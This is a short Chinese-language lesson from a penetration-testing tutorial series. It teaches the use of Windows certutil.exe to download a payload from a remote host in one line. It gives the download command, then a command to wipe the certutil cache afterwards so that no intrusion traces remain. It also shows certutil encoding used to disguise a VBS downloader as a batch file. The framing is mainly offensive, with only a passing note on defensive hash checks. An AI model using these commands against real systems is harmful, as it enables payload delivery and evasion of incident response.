第三十八課:certutil一句話下載payload
專注APT攻擊與防御
https://micropoor.blogspot.com/
certutil微軟官方是這樣對(duì)它解釋的:
Certutil.exe是一個(gè)命令行程序,作為證書服務(wù)的一部分安裝。您可以使用Certutil.exe轉(zhuǎn)儲(chǔ)
和顯示證書頒發(fā)機(jī)構(gòu)(CA)配置信息,配置證書服務(wù),備份和還原CA組件以及驗(yàn)證證書,密鑰對(duì)和證書鏈。
url:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2012-R2-and-2012/cc732443(v=ws.11)
但是近些年好像被玩壞了。
靶機(jī):windows 2003 windows 7
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt
默認(rèn)下載為bin文件。但是不影響在命令行下使用。
certutil.exe下載有個(gè)弊端,它的每一次下載都有留有緩存,而導(dǎo)致留下入侵痕跡,所以每次下載后,需要馬上執(zhí)行如下:
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete
而在應(yīng)急中certutil也是常用工具之一,來對(duì)比文件hash,來判斷疑似文件。
Windows 2003:
Windows 7:
certutil的其它高級(jí)應(yīng)用:
C:>certutil -encode c:downfile.vbs downfile.bat
file:downfile.bat
解密:
file:downfile.txt
后者的話:powershell內(nèi)存加載配合certutil解密是一件非常有趣的事情。會(huì)在未來的系列中講述。
Micropoor
?
